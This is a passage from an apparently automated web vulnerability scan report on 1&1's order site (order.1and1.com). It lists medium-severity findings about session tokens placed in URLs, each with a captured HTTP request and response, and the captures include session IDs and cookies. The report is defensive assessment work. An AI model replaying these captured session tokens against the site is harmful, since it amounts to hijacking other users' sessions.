<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&amp;__lf=Order-Tariff&amp;linkOrigin=VirtualServerL&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.100. http://order.1and1.com/xml/order/VirtualServerL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.101. http://order.1and1.com/xml/order/VirtualServerXL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXL

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServerXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:16 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXL?__frame=_top&__lf=Order-Tariff&ordernow=true
Content-Length: 0
Connection: close
Content-Type: text/plain


3.102. http://order.1and1.com/xml/order/VirtualServerXXL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerXXL

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/VirtualServerXXL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/VirtualServerXXL?__frame=_top&__lf=Order-Tariff&ordernow=true
Content-Length: 0
Connection: close
Content-Type: text/plain


3.103. http://order.1and1.com/xml/order/a  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/a

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/a;jsessionid=32FBEC28C43E74DBD62611CCB0A88751.TCpfix142a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320185042-000.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:36:AAABLtRpVq_aAytDkGAYcbJbpeGoxEgR:1300643796655; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; __PFIX_TST_=11df10d3b144d000

Response

HTTP/1.1 404 Not Found
Date: Sun, 20 Mar 2011 17:56:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1439

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>1&amp;1 Internet AG - Page or Document not found</title>
<meta h
...[SNIP]...

3.104. http://order.1and1.com/xml/order/addon  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/addon

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/addon;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.packageselection HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:52:13 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/addon?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.packageselection
Content-Length: 0
Connection: close
Content-Type: text/plain


3.105. http://order.1and1.com/xml/order/costs  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/costs

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.yourcart HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4ce5cf5491256400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://order.1and1.com/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=domaincheck&linkId=hd.tab.yourcart
Content-Length: 0
Connection: close
Content-Type: text/plain


3.106. http://order.1and1.com/xml/order/domaincheck  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.107. http://order.1and1.com/xml/order/domaincheck  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/domaincheck

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642646570&__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:28 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Jc2g4OzwyW1tbVWheZStjXSocJl9pYztSRT8nKygoJyUnJSIiJSQeISUYGjAvLFE/a2BicCgqJVUuWGctICEdHCEdMjUzLTUsKzRsbTMoL19oLiEiHh0iHxw2MTQ1Li8=; Expires=Fri, 07-Apr-2079 20:51:35 GMT; Path=/
ETag: 9d266795a44ed2da88d7a484c599a6b6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 20142


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=domaincheck&amp;linkOrigin=domaincheck&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=domaincheck&amp;page=switch&amp;linkOrigin=domaincheck&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?linkType=&amp;linkOrigin=&amp;linkid=hd.tab.packageselection"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.tab.packageselection" rel="button-hd-tab-packageselection"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
<div class="all_link"><a rel="height=600, width=700" class="window-open" href="/xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order">
All domain prices
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=domaincheck&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Order&amp;linkOrigin=domaincheck&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.108. http://order.1and1.com/xml/order/eshopupselling  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
